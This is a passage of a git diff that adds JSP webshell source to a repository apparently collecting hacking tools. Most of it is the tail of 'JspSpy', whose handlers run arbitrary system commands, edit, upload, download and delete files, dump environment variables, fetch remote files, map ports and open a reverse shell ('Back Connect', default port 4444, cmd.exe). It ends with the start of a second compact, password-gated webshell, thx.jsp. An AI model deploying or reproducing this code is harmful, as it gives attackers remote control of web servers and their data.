    "); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class VCreateFileInvoker extends DefaultInvoker { +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +String path = request.getParameter("filepath"); +File f = new File(path); +if (!f.isAbsolute()) { +String oldPath = path; +path = JSession.getAttribute(CURRENT_DIR).toString(); +if (!path.endsWith("/")) +path+="/"; +path+=oldPath; +f = new File(path); +f.createNewFile(); +} else { +f.createNewFile(); +} +out.println("
    "+ +"
    "+ +"

    Create / Edit File »

    "+ +""+ +"

    Current File (import new file name and new file)

    "+ +"

    File Content

    "+ +"

    "+ +"
    "+ +"
    "); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class VEditInvoker extends DefaultInvoker { +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +String path = request.getParameter("filepath"); +File f = new File(path); +if (f.exists()) { +BufferedReader reader = new BufferedReader(new FileReader(f)); +StringBuilder content = new StringBuilder(); +String s = reader.readLine(); +while (s != null) { +content.append(s+"\r\n"); +s = reader.readLine(); +} +reader.close(); +out.println("
    "+ +"
    "+ +"

    Create / Edit File »

    "+ +""+ +"

    Current File (import new file name and new file)

    "+ +"

    File Content

    "+ +"

    "+ +"
    "+ +"
    "); +} +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class CreateFileInvoker extends DefaultInvoker { +public boolean doBefore(){return false;} +public boolean doAfter(){return false;} +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +String path = request.getParameter("filepath"); +String content = request.getParameter("filecontent"); + +BufferedWriter outs = new BufferedWriter(new FileWriter(new File(path))); +outs.write(content,0,content.length()); +outs.close(); +JSession.setAttribute(MSG,"Save File Success!"); +response.sendRedirect(SHELL_NAME+"?o=index"); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class VEditPropertyInvoker extends DefaultInvoker { +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +String filepath = request.getParameter("filepath"); +File f = new File(filepath); +if (!f.exists()) +return; +String read = f.canRead() ? "checked=\"checked\"" : ""; +String write = f.canWrite() ? "checked=\"checked\"" : ""; +String execute = ""; +Calendar cal = Calendar.getInstance(); +cal.setTimeInMillis(f.lastModified()); + +out.println("
    "+ +"
    "+ +"

    Set File Property »

    "+ +"

    Current file (fullpath)

    "+ +" "+ +"

    Read: "+ +" "+ +" Write: "+ +" "+ +" Execute: "+ +" "+ +"

    "+ +"

    Instead »"+ +"year:"+ +""+ +"month:"+ +""+ +"day:"+ +""+ +""+ +"hour:"+ +""+ +"minute:"+ +""+ +"second:"+ +""+ +"

    "+ +"

    "+ +"
    "+ +"
    "); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class EditPropertyInvoker extends DefaultInvoker { +public boolean doBefore(){return false;} +public boolean doAfter(){return false;} +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +String f = request.getParameter("file"); +File file = new File(f); +if (!file.exists()) +return; + +String year = request.getParameter("year"); +String month = request.getParameter("month"); +String date = request.getParameter("date"); +String hour = request.getParameter("hour"); +String minute = request.getParameter("minute"); +String second = request.getParameter("second"); + +Calendar cal = Calendar.getInstance(); +cal.set(Calendar.YEAR,Integer.parseInt(year)); +cal.set(Calendar.MONTH,Integer.parseInt(month)-1); +cal.set(Calendar.DATE,Integer.parseInt(date)); +cal.set(Calendar.HOUR,Integer.parseInt(hour)); +cal.set(Calendar.MINUTE,Integer.parseInt(minute)); +cal.set(Calendar.SECOND,Integer.parseInt(second)); +if(file.setLastModified(cal.getTimeInMillis())){ +JSession.setAttribute(MSG,"Reset File Property Success!"); +} else { +JSession.setAttribute(MSG,"Reset File Property Failed!"); +} +response.sendRedirect(SHELL_NAME+"?o=index"); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +//VShell +private static class VsInvoker extends DefaultInvoker{ +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +String cmd = request.getParameter("command"); +String program = request.getParameter("program"); +if (cmd == null) cmd = "cmd.exe /c set"; +if (program == null) program = "cmd.exe /c net start > "+SHELL_DIR+"/Log.txt"; +if (JSession.getAttribute(MSG)!=null) { +Util.outMsg(out,JSession.getAttribute(MSG).toString()); +JSession.removeAttribute(MSG); +} +out.println(""+ +"
    "+ +"
    "+ +"

    Execute Program »

    "+ +"

    "+ +""+ +""+ +"Parameter
    "+ +""+ +"

    "+ +"
    "+ +"
    "+ +"

    Execute Shell »

    "+ +"

    "+ +""+ +""+ +"Parameter
    "+ +""+ +"

    "+ +"
    "+ +"
    "); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class ShellInvoker extends DefaultInvoker{ +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +String type = request.getParameter("type"); +if (type.equals("command")) { +ins.get("vs").invoke(request,response,JSession); +out.println("
    "); +out.println("
    ");
+String command = request.getParameter("command");
+if (!Util.isEmpty(command)) {
+Process pro = Runtime.getRuntime().exec(command);
+BufferedReader reader = new BufferedReader(new InputStreamReader(pro.getInputStream()));
+String s = reader.readLine();
+while (s != null) {
+out.println(Util.htmlEncode(Util.getStr(s)));
+s = reader.readLine();
+}
+reader.close();
+out.println("
    "); +} +} else { +String program = request.getParameter("program"); +if (!Util.isEmpty(program)) { +Process pro = Runtime.getRuntime().exec(program); +JSession.setAttribute(MSG,"Program Has Run Success!"); +ins.get("vs").invoke(request,response,JSession); +} +} +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class DownInvoker extends DefaultInvoker{ +public boolean doBefore(){return false;} +public boolean doAfter(){return false;} +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +String path = request.getParameter("path"); +if (Util.isEmpty(path)) +return; +File f = new File(path); +if (!f.exists()) +return; +response.setHeader("Content-Disposition","attachment;filename="+URLEncoder.encode(f.getName(),PAGE_CHARSET)); +BufferedInputStream input = new BufferedInputStream(new FileInputStream(f)); +BufferedOutputStream output = new BufferedOutputStream(response.getOutputStream()); +byte[] data = new byte[1024]; +int len = input.read(data); +while (len != -1) { +output.write(data,0,len); +len = input.read(data); +} +input.close(); +output.close(); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +//VDown +private static class VdInvoker extends DefaultInvoker { +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +String savepath = request.getParameter("savepath"); +String url = request.getParameter("url"); +if (Util.isEmpty(url)) +url = "http://www.baidu.com/"; +if (Util.isEmpty(savepath)) { +savepath = JSession.getAttribute(CURRENT_DIR).toString(); +} +if (!Util.isEmpty(JSession.getAttribute("done"))) { +Util.outMsg(out,"Download Remote File Success!"); +JSession.removeAttribute("done"); +} +out.println("
    "+ +"
    "+ +"

    Remote File DownLoad »

    "+ +"

    "+ +""+ +"Remote File URL:"+ +" "+ +"Save Path:"+ +""+ +""+ +"

    "+ +"
    "); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class DownRemoteInvoker extends DefaultInvoker { +public boolean doBefore(){return true;} +public boolean doAfter(){return true;} +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +String downFileUrl = request.getParameter("url"); +String savePath = request.getParameter("savepath"); +if (Util.isEmpty(downFileUrl) || Util.isEmpty(savePath)) +return; +URL downUrl = new URL(downFileUrl); +URLConnection conn = downUrl.openConnection(); +BufferedInputStream in = new BufferedInputStream(conn.getInputStream()); +BufferedOutputStream out = new BufferedOutputStream(new FileOutputStream(new File(savePath))); +byte[] data = new byte[1024]; +int len = in.read(data); +while (len != -1) { +out.write(data,0,len); +len = in.read(data); +} +in.close(); +out.close(); +JSession.setAttribute("done","d"); +ins.get("vd").invoke(request,response,JSession); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class IndexInvoker extends DefaultInvoker { +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +ins.get("filelist").invoke(request,response,JSession); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class MkDirInvoker extends DefaultInvoker { +public boolean doBefore(){return false;} +public boolean doAfter(){return false;} +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +String name = request.getParameter("name"); +File f = new File(name); +if (!f.isAbsolute()) { +String path = JSession.getAttribute(CURRENT_DIR).toString(); +if (!path.endsWith("/")) +path += "/"; +path += name; +f = new File(path); +} +f.mkdirs(); +JSession.setAttribute(MSG,"Make Directory Success!"); +response.sendRedirect(SHELL_NAME+"?o=index"); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class MoveInvoker extends DefaultInvoker { +public boolean doBefore(){return false;} +public boolean doAfter(){return false;} +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +String src = request.getParameter("src"); +String target = request.getParameter("to"); +if (!Util.isEmpty(target) && !Util.isEmpty(src)) { +File file = new File(src); +if(file.renameTo(new File(target))) { +JSession.setAttribute(MSG,"Move File Success!"); +} else { +String msg = "Move File Failed!"; +if (file.isDirectory()) { +msg += "The Move Will Failed When The Directory Is Not Empty."; +} +JSession.setAttribute(MSG,msg); +} +response.sendRedirect(SHELL_NAME+"?o=index"); +} +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class RemoteDirInvoker extends DefaultInvoker { +public boolean doBefore(){return false;} +public boolean doAfter(){return false;} +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +String dir = request.getParameter("dir"); +File file = new File(dir); +if (file.exists()) { +deleteFile(file); +deleteDir(file); +} + +JSession.setAttribute(MSG,"Remove Directory Success!"); +response.sendRedirect(SHELL_NAME+"?o=index"); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +public void deleteFile(File f) { +if (f.isFile()) { +f.delete(); +}else { +File[] list = f.listFiles(); +for (File ff:list) { +deleteFile(ff); +} +} +} +public void deleteDir(File f) { +File[] list = f.listFiles(); +if (list.length == 0) { +f.delete(); +} else { +for (File ff:list) { +deleteDir(ff); +} +deleteDir(f); +} +} +} +private static class PackBatchInvoker extends DefaultInvoker{ +public boolean doBefore(){return false;} +public boolean doAfter(){return false;} +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +String files = request.getParameter("files"); +if (Util.isEmpty(files)) +return; +String saveFileName = request.getParameter("savefilename"); +File saveF = new File(JSession.getAttribute(CURRENT_DIR).toString(),saveFileName); +if (saveF.exists()) { +JSession.setAttribute(MSG,"The File \""+saveFileName+"\" Has Been Exists!"); +response.sendRedirect(SHELL_NAME+"?o=index"); +return; +} +ZipOutputStream zout = new ZipOutputStream(new BufferedOutputStream(new FileOutputStream(saveF))); +String[] arr = files.split(","); +for (String f:arr) { +File pF = new File(JSession.getAttribute(CURRENT_DIR).toString(),f); +ZipEntry entry = new ZipEntry(pF.getName()); +zout.putNextEntry(entry); +FileInputStream fInput = new FileInputStream(pF); +int len = 0; +byte[] buf = new byte[1024]; +while ((len = fInput.read(buf)) != -1) { +zout.write(buf, 0, len); +zout.flush(); +} +fInput.close(); +} +zout.close(); +JSession.setAttribute(MSG,"Pack Files Success!"); +response.sendRedirect(SHELL_NAME+"?o=index"); +} catch (Exception e) { +e.printStackTrace(); +throw e; +} +} +} +private static class PackInvoker extends DefaultInvoker { +public boolean doBefore(){return false;} +public boolean doAfter(){return false;} +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +String packedFile = request.getParameter("packedfile"); +if (Util.isEmpty(packedFile)) +return; +String saveFileName = request.getParameter("savefilename"); +File saveF = new File(JSession.getAttribute(CURRENT_DIR).toString(),saveFileName); +if (saveF.exists()) { +JSession.setAttribute(MSG,"The File \""+saveFileName+"\" Has Been Exists!"); +response.sendRedirect(SHELL_NAME+"?o=index"); +return; +} +File pF = new File(packedFile); +ZipOutputStream zout = new ZipOutputStream(new BufferedOutputStream(new FileOutputStream(saveF))); +String base = ""; +if (pF.isDirectory()) { +zipDir(pF,base,zout); +} else { +zipFile(pF,base,zout); +} +zout.close(); +JSession.setAttribute(MSG,"Pack File Success!"); +response.sendRedirect(SHELL_NAME+"?o=index"); +} catch (Exception e) { +e.printStackTrace(); +throw e; +} +} +public void zipDir(File f,String base,ZipOutputStream zout) throws Exception { +if (f.isDirectory()) { +File[] arr = f.listFiles(); +for (File ff:arr) { +String tmpBase = base; +if (!Util.isEmpty(tmpBase) && !tmpBase.endsWith("/")) +tmpBase += "/"; +zipDir(ff,tmpBase+f.getName(),zout); +} +} else { +String tmpBase = base; +if (!Util.isEmpty(tmpBase) &&!tmpBase.endsWith("/")) +tmpBase += "/"; +zipFile(f,tmpBase,zout); +} +} +public void zipFile(File f,String base,ZipOutputStream zout) throws Exception{ +ZipEntry entry = new ZipEntry(base+f.getName()); +zout.putNextEntry(entry); +FileInputStream fInput = new FileInputStream(f); +int len = 0; +byte[] buf = new byte[1024]; +while ((len = fInput.read(buf)) != -1) { +zout.write(buf, 0, len); +zout.flush(); +} +fInput.close(); +} +} +private static class UnPackInvoker extends DefaultInvoker { +public boolean doBefore(){return false;} +public boolean doAfter(){return false;} +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +String savepath = request.getParameter("savepath"); +String zipfile = request.getParameter("zipfile"); +if (Util.isEmpty(savepath) || Util.isEmpty(zipfile)) +return; +File save = new File(savepath); +save.mkdirs(); +ZipFile file = new ZipFile(new File(zipfile)); +Enumeration e = file.entries(); +while (e.hasMoreElements()) { +ZipEntry en = (ZipEntry) e.nextElement(); +String entryPath = en.getName(); +int index = entryPath.lastIndexOf("/"); +if (index != -1) +entryPath = entryPath.substring(0,index); +File absEntryFile = new File(save,entryPath); +if (!absEntryFile.exists() && (en.isDirectory() || en.getName().indexOf("/") != -1)) +absEntryFile.mkdirs(); +BufferedOutputStream output = null; +BufferedInputStream input = null; +try { +output = new BufferedOutputStream( +new FileOutputStream(new File(save,en.getName()))); +input = new BufferedInputStream( +file.getInputStream(en)); +byte[] b = new byte[1024]; +int len = input.read(b); +while (len != -1) { +output.write(b, 0, len); +len = input.read(b); +} +} catch (Exception ex) { +} finally { +try { +if (output != null) +output.close(); +if (input != null) +input.close(); +} catch (Exception ex1) { +} +} +} +file.close(); +JSession.setAttribute(MSG,"Unzip File Success!"); +response.sendRedirect(SHELL_NAME+"?o=index"); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +//VMapPort +private static class VmpInvoker extends DefaultInvoker { +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +Object localIP = JSession.getAttribute("localIP"); +Object localPort = JSession.getAttribute("localPort"); +Object remoteIP = JSession.getAttribute("remoteIP"); +Object remotePort = JSession.getAttribute("remotePort"); +Object done = JSession.getAttribute("done"); + +JSession.removeAttribute("localIP"); +JSession.removeAttribute("localPort"); +JSession.removeAttribute("remoteIP"); +JSession.removeAttribute("remotePort"); +JSession.removeAttribute("done"); + +if (Util.isEmpty(localIP)) +localIP = InetAddress.getLocalHost().getHostAddress(); +if (Util.isEmpty(localPort)) +localPort = "3389"; +if (Util.isEmpty(remoteIP)) +remoteIP = "www.baidu.com"; +if (Util.isEmpty(remotePort)) +remotePort = "80"; +if (!Util.isEmpty(done)) +Util.outMsg(out,done.toString()); + +out.println("
    "+ +""+ +" "+ +" "+ +" "+ +""+ +"

    PortMap >>

    "+ +"
    "+ +" "+ +" "+ +" "+ +" "+ +" "+ +" "+ +" "+ +" "+ +" "+ +" "+ +" "+ +"
    Local Ip :"+ +" "+ +" Local Port :"+ +" Remote Ip :"+ +" Remote Port :"+ +"

    "+ +" "+ +" "+ +"
    "+ +"
    "+ +"
    "+ +"
    "); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +//StopMapPort +private static class SmpInvoker extends DefaultInvoker { +public boolean doAfter(){return true;} +public boolean doBefore(){return true;} +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +Object obj = JSession.getAttribute(PORT_MAP); +if (obj != null) { +ServerSocket server = (ServerSocket)JSession.getAttribute(PORT_MAP); +server.close(); +} +JSession.setAttribute("done","Stop Success!"); +ins.get("vmp").invoke(request,response,JSession); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class MapPortInvoker extends DefaultInvoker { +public boolean doBefore(){return false;} +public boolean doAfter(){return false;} +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +String localIP = request.getParameter("localIP"); +String localPort = request.getParameter("localPort"); +final String remoteIP = request.getParameter("remoteIP"); +final String remotePort = request.getParameter("remotePort"); +if (Util.isEmpty(localIP) || Util.isEmpty(localPort) || Util.isEmpty(remoteIP) || Util.isEmpty(remotePort)) +return; +Object obj = JSession.getAttribute(PORT_MAP); +if (obj != null) { +ServerSocket s = (ServerSocket)obj; +s.close(); +} +final ServerSocket server = new ServerSocket(); +server.bind(new InetSocketAddress(localIP,Integer.parseInt(localPort))); +JSession.setAttribute(PORT_MAP,server); +new Thread(new Runnable(){ +public void run(){ +while (true) { +Socket soc = null; +Socket remoteSoc = null; +DataInputStream remoteIn = null; +DataOutputStream remoteOut = null; +DataInputStream localIn = null; +DataOutputStream localOut = null; +try{ +soc = server.accept(); +remoteSoc = new Socket(); +remoteSoc.connect(new InetSocketAddress(remoteIP,Integer.parseInt(remotePort))); +remoteIn = new DataInputStream(remoteSoc.getInputStream()); +remoteOut = new DataOutputStream(remoteSoc.getOutputStream()); +localIn = new DataInputStream(soc.getInputStream()); +localOut = new DataOutputStream(soc.getOutputStream()); +this.readFromLocal(localIn,remoteOut); +this.readFromRemote(soc,remoteSoc,remoteIn,localOut); +}catch(Exception ex) +{ +break; +} +} +} +public void readFromLocal(final DataInputStream localIn,final DataOutputStream remoteOut){ +new Thread(new Runnable(){ +public void run(){ +while (true) { +try{ +byte[] data = new byte[100]; +int len = localIn.read(data); +while (len != -1) { +remoteOut.write(data,0,len); +len = localIn.read(data); +} +}catch (Exception e) { +break; +} +} +} +}).start(); +} +public void readFromRemote(final Socket soc,final Socket remoteSoc,final DataInputStream remoteIn,final DataOutputStream localOut){ +new Thread(new Runnable(){ +public void run(){ +while(true) { +try{ +byte[] data = new byte[100]; +int len = remoteIn.read(data); +while (len != -1) { +localOut.write(data,0,len); +len = remoteIn.read(data); +} +}catch (Exception e) { +try{ +soc.close(); +remoteSoc.close(); +}catch(Exception ex) { +} +break; +} +} +} +}).start(); +} +}).start(); +JSession.setAttribute("done","Map Port Success!"); +JSession.setAttribute("localIP",localIP); +JSession.setAttribute("localPort",localPort); +JSession.setAttribute("remoteIP",remoteIP); +JSession.setAttribute("remotePort",remotePort); +response.sendRedirect(SHELL_NAME+"?o=vmp"); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +//VBackConnect +private static class VbcInvoker extends DefaultInvoker { +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +Object ip = JSession.getAttribute("ip"); +Object port = JSession.getAttribute("port"); +Object program = JSession.getAttribute("program"); +Object done = JSession.getAttribute("done"); +JSession.removeAttribute("ip"); +JSession.removeAttribute("port"); +JSession.removeAttribute("program"); +JSession.removeAttribute("done"); +if (Util.isEmpty(ip)) +ip = request.getRemoteAddr(); +if (Util.isEmpty(port) || !Util.isInteger(port.toString())) +port = "4444"; +if (Util.isEmpty(program)) +program = "cmd.exe"; +if (!Util.isEmpty(done)) +Util.outMsg(out,done.toString()); +out.println("
    "+ +""+ +" "+ +" "+ +" "+ +""+ +"

    Back Connect >>

    "+ +"
    "+ +" "+ +" "+ +" "+ +" "+ +" "+ +" "+ +" "+ +" "+ +"
    Your Ip :"+ +" "+ +" Your Port :"+ +" Program To Back :"+ +"

    "+ +" "+ +"
    "+ +"
    "+ +"
    "+ +"
    "); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class BackConnectInvoker extends DefaultInvoker { +public boolean doAfter(){return false;} +public boolean doBefore(){return false;} +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +String ip = request.getParameter("ip"); +String port = request.getParameter("port"); +String program = request.getParameter("program"); +if (Util.isEmpty(ip) || Util.isEmpty(program) || !Util.isInteger(port)) +return; +Socket socket = new Socket(ip,Integer.parseInt(port)); +Process process = Runtime.getRuntime().exec(program); +(new StreamConnector(process.getInputStream(), socket.getOutputStream())).start(); +(new StreamConnector(socket.getInputStream(), process.getOutputStream())).start(); +JSession.setAttribute("done","Back Connect Success!"); +JSession.setAttribute("ip",ip); +JSession.setAttribute("port",port); +JSession.setAttribute("program",program); +response.sendRedirect(SHELL_NAME+"?o=vbc"); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class JspEnvInvoker extends DefaultInvoker { +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +out.println(""+ +" "+ +" "+ +" "+ +"

    System Properties >>

    "+ +"
    "+ +"
    "+ +"
      "); +Properties pro = System.getProperties(); +Enumeration names = pro.propertyNames(); +while (names.hasMoreElements()){ +String name = (String)names.nextElement(); +out.println("
    • "+Util.htmlEncode(name)+" : "+Util.htmlEncode(pro.getProperty(name))+"
      • "); +} +out.println("

    System Environment >>

      "); +Map envs = System.getenv(); +Set> entrySet = envs.entrySet(); +for (Map.Entry en:entrySet) { +out.println("
    • "+Util.htmlEncode(en.getKey())+" : "+Util.htmlEncode(en.getValue())+"
      • "); +} +out.println("
    "); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class TopInvoker extends DefaultInvoker { +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +out.println("
    "+ +""+ +" "+ +" "+ +" "+ +" "+ +" "+ +"
    JspSpy Ver: 2009"+request.getHeader("host")+" ("+InetAddress.getLocalHost().getHostAddress()+")
    Logout | "+ +" File Manager | "+ +" DataBase Manager | "+ +" Execute Command | "+ +" Shell OnLine | "+ +" Back Connect | "+ +" Port Scan | "+ +" Download Remote File | "+ +" ClipBoard | "+ +" Remote Control | "+ +" Port Map | "+ +" JSP Env "+ +"
    "); +if (JSession.getAttribute(MSG) != null) { +Util.outMsg(out,JSession.getAttribute(MSG).toString()); +JSession.removeAttribute(MSG); +} +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class VOnLineShellInvoker extends DefaultInvoker { +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +out.println(""); +out.println(""+ +" "+ +" "+ +" "+ +"
    "); +out.println("

    Shell OnLine »


    "); +out.println("
    "+ +" "+ +" "+ +" Notice ! If You Are Using IE , You Must Input A Command First After You Start Or You Will Not See The Echo"+ +"
    "+ +"
    "+ +" "+ +"
    "+ +" "+ +" "+ +" "+ +" Auto Scroll"+ +" "+ +"
    "+ +" " +); +out.println("
    "); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class OnLineInvoker extends DefaultInvoker { +public boolean doBefore(){return false;} +public boolean doAfter(){return false;} +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +String type = request.getParameter("type"); +if (Util.isEmpty(type)) +return; +if (type.toLowerCase().equals("start")) { +String exe = request.getParameter("exe"); +if (Util.isEmpty(exe)) +return; +Process pro = Runtime.getRuntime().exec(exe); +ByteArrayOutputStream outs = new ByteArrayOutputStream(); +response.setContentLength(100000000); +response.setContentType("text/html;charset="+Charset.defaultCharset().name()); +OnLineProcess olp = new OnLineProcess(pro); +JSession.setAttribute(SHELL_ONLINE,olp); +new OnLineConnector(new ByteArrayInputStream(outs.toByteArray()),pro.getOutputStream(),"exeOclientR",olp).start(); +new OnLineConnector(pro.getInputStream(),response.getOutputStream(),"exeRclientO",olp).start(); +new OnLineConnector(pro.getErrorStream(),response.getOutputStream(),"exeRclientO",olp).start();//错误信息流。 +Thread.sleep(1000 * 60 * 60 * 24); +} else if (type.equals("ecmd")) { +Object o = JSession.getAttribute(SHELL_ONLINE); +String cmd = request.getParameter("cmd"); +if (Util.isEmpty(cmd)) +return; +if (o == null) +return; +OnLineProcess olp = (OnLineProcess)o; +olp.setCmd(cmd); +} else { +Object o = JSession.getAttribute(SHELL_ONLINE); +if (o == null) +return; +OnLineProcess olp = (OnLineProcess)o; +olp.stop(); +} +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} + +static{ +ins.put("script",new ScriptInvoker()); +ins.put("before",new BeforeInvoker()); +ins.put("after",new AfterInvoker()); +ins.put("deleteBatch",new DeleteBatchInvoker()); +ins.put("clipboard",new ClipBoardInvoker()); +ins.put("vRemoteControl",new VRemoteControlInvoker()); +ins.put("gc",new GcInvoker()); +ins.put("vPortScan",new VPortScanInvoker()); +ins.put("portScan",new PortScanInvoker()); +ins.put("vConn",new VConnInvoker()); +ins.put("dbc",new DbcInvoker()); +ins.put("executesql",new ExecuteSQLInvoker()); +ins.put("vLogin",new VLoginInvoker()); +ins.put("login",new LoginInvoker()); +ins.put("filelist", new FileListInvoker()); +ins.put("logout",new LogoutInvoker()); +ins.put("upload",new UploadInvoker()); +ins.put("copy",new CopyInvoker()); +ins.put("bottom",new BottomInvoker()); +ins.put("vCreateFile",new VCreateFileInvoker()); +ins.put("vEdit",new VEditInvoker()); +ins.put("createFile",new CreateFileInvoker()); +ins.put("vEditProperty",new VEditPropertyInvoker()); +ins.put("editProperty",new EditPropertyInvoker()); +ins.put("vs",new VsInvoker()); +ins.put("shell",new ShellInvoker()); +ins.put("down",new DownInvoker()); +ins.put("vd",new VdInvoker()); +ins.put("downRemote",new DownRemoteInvoker()); +ins.put("index",new IndexInvoker()); +ins.put("mkdir",new MkDirInvoker()); +ins.put("move",new MoveInvoker()); +ins.put("removedir",new RemoteDirInvoker()); +ins.put("packBatch",new PackBatchInvoker()); +ins.put("pack",new PackInvoker()); +ins.put("unpack",new UnPackInvoker()); +ins.put("vmp",new VmpInvoker()); +ins.put("vbc",new VbcInvoker()); +ins.put("backConnect",new BackConnectInvoker()); +ins.put("jspEnv",new JspEnvInvoker()); +ins.put("smp",new SmpInvoker()); +ins.put("mapPort",new MapPortInvoker()); +ins.put("top",new TopInvoker()); +ins.put("vso",new VOnLineShellInvoker()); +ins.put("online",new OnLineInvoker()); +} +%> +<% +try { +String o = request.getParameter("o"); +if (!Util.isEmpty(o)) { +Invoker in = ins.get(o); +if (in == null) { +response.sendRedirect(SHELL_NAME+"?o=index"); +} else { +if (in.doBefore()) { +String path = request.getParameter("folder"); +if (!Util.isEmpty(path)) +session.setAttribute(CURRENT_DIR,path); +ins.get("before").invoke(request,response,session); +ins.get("script").invoke(request,response,session); +ins.get("top").invoke(request,response,session); +} +in.invoke(request,response,session); +if (!in.doAfter()) { +return; +}else{ +ins.get("bottom").invoke(request,response,session); +ins.get("after").invoke(request,response,session); +} +} +} else { +response.sendRedirect(SHELL_NAME+"?o=index"); +} +} catch (Exception e) { +ByteArrayOutputStream bout = new ByteArrayOutputStream(); +e.printStackTrace(new PrintStream(bout)); +session.setAttribute(CURRENT_DIR,SHELL_DIR); +Util.outMsg(out,Util.htmlEncode(new String(bout.toByteArray())).replace("\n","
    "),"left"); +bout.close(); +out.flush(); +ins.get("bottom").invoke(request,response,session); +ins.get("after").invoke(request,response,session); +} +%> diff --git a/jsp/hackk8/JSP/other/thx.jsp b/jsp/hackk8/JSP/other/thx.jsp new file mode 100644 index 0000000..7c9cbe4 --- /dev/null +++ b/jsp/hackk8/JSP/other/thx.jsp @@ -0,0 +1,59 @@ +<%@page import="java.io.*,java.util.*,java.net.*,java.sql.*,java.text.*"%> +<%! +String Pwd="xc"; +String EC(String s,String c)throws Exception{return s;}//new String(s.getBytes("ISO-8859-1"),c);} +Connection GC(String s)throws Exception{String[] x=s.trim().split("\r\n");Class.forName(x[0].trim()).newInstance(); +Connection c=DriverManager.getConnection(x[1].trim());if(x.length>2){c.setCatalog(x[2].trim());}return c;} +void AA(StringBuffer sb)throws Exception{File r[]=File.listRoots();for(int i=0;i"+"|").getBytes(),0,3);while((n=is.read(b,0,512))!=-1){os.write(b,0,n);}os.write(("|"+"<-").getBytes(),0,3);os.close();is.close();} +void GG(String s, String d)throws Exception{String h="0123456789ABCDEF";int n;File f=new File(s);f.createNewFile(); +FileOutputStream os=new FileOutputStream(f);for(int i=0;i<% +String cs=request.getParameter("z0")+"";request.setCharacterEncoding(cs);response.setContentType("text/html;charset="+cs); +String Z=EC(request.getParameter(Pwd)+"",cs);String z1=EC(request.getParameter("z1")+"",cs);String z2=EC(request.getParameter("z2")+"",cs); +StringBuffer sb=new StringBuffer("");try{sb.append("->"+"|"); +if(Z.equals("A")){String s=new File(application.getRealPath(request.getRequestURI())).getParent();sb.append(s+"\t");if(!s.substring(0,1).equals("/")){AA(sb);}} +else if(Z.equals("B")){BB(z1,sb);}else 